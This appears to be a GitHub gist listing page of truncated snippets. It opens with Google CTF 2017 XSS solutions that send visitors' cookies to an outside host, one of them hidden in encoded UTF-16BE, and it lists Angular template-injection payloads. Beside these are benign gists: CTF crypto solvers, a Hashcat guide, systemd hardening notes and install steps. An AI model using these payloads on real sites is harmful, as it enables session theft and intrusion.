
@buglloc
buglloc / input.html
Last active May 21, 2018 10:24
Geokitties v2 (#GoogleCTF 2017)
<a onclicK="" onclick="window.location.href = 'https://www.buglloc.com/lala?' + document.cookie;return false;" href="https://ya.ru">asd</a>
@buglloc
buglloc / input.html
Created June 19, 2017 09:11
The X Sanitizer (#GoogleCTF 2017)
<link rel="import" href="/sandbox?html=<script charset=UTF%2d16BE src=/sandbox%3fhtml=%2500%253D%2500%2528%2500%2577%2500%2569%2500%256E%2500%2564%2500%256F%2500%2577%2500%252E%2500%256C%2500%256F%2500%2563%2500%2561%2500%2574%2500%2569%2500%256F%2500%256E%2500%252E%2500%2568%2500%2572%2500%2565%2500%2566%2500%253D%2500%2522%2500%2568%2500%2574%2500%2574%2500%2570%2500%2573%2500%253A%2500%252F%2500%252F%2500%2577%2500%2577%2500%2577%2500%252E%2500%2562%2500%2575%2500%2567%2500%256C%2500%256C%2500%256F%2500%2563%2500%252E%2500%2563%2500%256F%2500%256D%2500%252F%2500%2561%2500%253F%2500%2522%2500%2520%2500%252B%2500%2520%2500%2564%2500%256F%2500%2563%2500%2575%2500%256D%2500%2565%2500%256E%2500%2574%2500%252E%2500%2563%2500%256F%2500%256F%2500%256B%2500%2569%2500%2565%2500%2529></script>'>">
@hellman
hellman / crypto_backdoor.py
Last active June 15, 2019 07:00
Google CTF 2017 Quals - Crypto Backdoor
def I(s):
    val = 0
    for i in range(len(s)):
        digit = ord(s[len(s) - i - 1])
        val <<= 8
        val |= digit
    return val
def Sn(i, length):
    s = ''
@hellman
hellman / 0solve.py
Last active September 3, 2017 16:22
Google CTF 2017 Quals - Introspective CRC
'''
CRC is affine.
CRC(x) = L(x) + C, where L is linear.
We want CRC(x) = L(x) + C = x.
Write as L(x)+x = C.
Solve matrix equation.
'''
from sage.all import *
@koenrh
koenrh / gcp-gpu-vm-hashcat.md
Last active June 14, 2024 17:37
Running Hashcat on Google Cloud's new GPU-based VMs

Running Hashcat on Google Cloud's GPU-based VMs

In February 2017, Google announced the availability of GPU-based VMs. I spun up a few of these instances, and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances, and install relevant drivers.

Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.

@ageis
ageis / systemd_service_hardening.md
Last active June 9, 2024 13:57
Options for hardening systemd service units

security and hardening options for systemd service units

A common and reliable pattern in service unit files is thus:

NoNewPrivileges=yes
PrivateTmp=yes
PrivateDevices=yes
DevicePolicy=closed
ProtectSystem=strict
private static ECKey generateECJWK(final ECKey.Curve curve)
        throws Exception {
    final ECParameterSpec ecParameterSpec = curve.toECParameterSpec();
    KeyPairGenerator generator = KeyPairGenerator.getInstance("EC");
    generator.initialize(ecParameterSpec);
    KeyPair keyPair = generator.generateKeyPair();
    final ECPrivateKey privateKey = (ECPrivateKey) keyPair.getPrivate();
@kennwhite
kennwhite / wifi_network_signal_notes.md
Last active October 22, 2019 16:31
Notes on troubleshooting home wifi 2.4GHz & 5GHz Wi-Fi network signals

Caveat: This worked for me, but might not for you. If you take any of my advice and something goes horribly wrong, you are entitled to a full refund of goose eggs.

TL;DR: For a 2-floor home, with a mix of 5+ year-old wifi devices, to reasonably new iOS, Macs, & set top boxes, and 22+ competing network signals, the best mix I found was:

Central 2nd floor wifi router, 5GHz band set to a fixed (not auto) channel, 802.11a/n, with 40MHz width produced optimal speed and reliability, delivering 78-145 Mbps down and ~25 Mbps up on a ~200Mbps connection. 2.4GHz band set to 802.11b/g/n with 20MHz width for old devices or extended range. The specific channels used should be entirely based on signal maps using the apps mentioned below. Sit where you and your friends/family sit (in bed, on the sofa, at the table, on the floor, wherever), and take several samples to find the least congested channels.

The 5GHz setup was the best setting for nearly every device (Nest, Roku 3, iPad 3rd gen, iPod 5th gen, and iPhone 6

@mccabe615
mccabe615 / AngularTI.md
Last active April 18, 2024 11:37
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
# Make sure you grab the latest version
curl -OL https://github.com/google/protobuf/releases/download/v3.2.0/protoc-3.2.0-linux-x86_64.zip
# Unzip
unzip protoc-3.2.0-linux-x86_64.zip -d protoc3
# Move protoc to /usr/local/bin/
sudo mv protoc3/bin/* /usr/local/bin/
# Move protoc3/include to /usr/local/include/